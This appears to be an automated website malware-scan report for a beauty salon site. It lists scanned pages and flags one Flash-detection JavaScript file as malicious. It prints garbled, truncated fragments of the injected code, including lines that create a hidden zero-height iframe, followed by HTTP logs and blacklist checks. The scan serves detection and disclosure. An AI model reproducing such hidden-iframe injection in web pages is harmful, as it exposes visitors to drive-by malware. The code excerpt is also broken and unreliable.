Scanned pages/files
Request | Server response | Status |
http://atbeautyart.com/ | 200 OK Content-Length: 7975 Content-Type: text/html | clean |
http://atbeautyart.com/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 15470 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false; var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var axo; var e; try { axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7"); version = axo.GetVariable("$version"); } catch (e) { } if (!version) if(f)e(s);} Decoded script: j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:
| ||
http://atbeautyart.com/service-facialgold.html | 200 OK Content-Length: 9508 Content-Type: text/html | clean |
http://atbeautyart.com/service-basicfacial.html | 200 OK Content-Length: 7018 Content-Type: text/html | clean |
http://atbeautyart.com/service-paraffinfacial.html | 200 OK Content-Length: 7790 Content-Type: text/html | clean |
http://atbeautyart.com/service-permanent.html | 200 OK Content-Length: 7878 Content-Type: text/html | clean |
http://atbeautyart.com/service-salonhair.html | 200 OK Content-Length: 10416 Content-Type: text/html | clean |
http://atbeautyart.com/service-additional.html | 200 OK Content-Length: 8646 Content-Type: text/html | clean |
http://atbeautyart.com/test404page.js | 404 Not Found Content-Length: 277 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: atbeautyart.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 15 Aug 2014 09:52:55 GMT
Accept-Ranges: bytes
ETag: "4e967b81-1f27"
Server: nginx
Content-Length: 7975
Content-Type: text/html
Last-Modified: Thu, 13 Oct 2011 05:47:45 GMT
X-Powered-By: PleskLin
...7975 bytes of data.
GET / HTTP/1.1
Host: atbeautyart.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 15 Aug 2014 09:52:55 GMT
Accept-Ranges: bytes
ETag: "4e967b81-1f27"
Server: nginx
Content-Length: 7975
Content-Type: text/html
Last-Modified: Thu, 13 Oct 2011 05:47:45 GMT
X-Powered-By: PleskLin
...7975 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: atbeautyart.com
Referer: http://www.google.com/search?q=atbeautyart.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: atbeautyart.com
Referer: http://www.google.com/search?q=atbeautyart.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=atbeautyart.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://atbeautyart.com/
Result: atbeautyart.com is not infected or malware details are not published yet.
Result: atbeautyart.com is not infected or malware details are not published yet.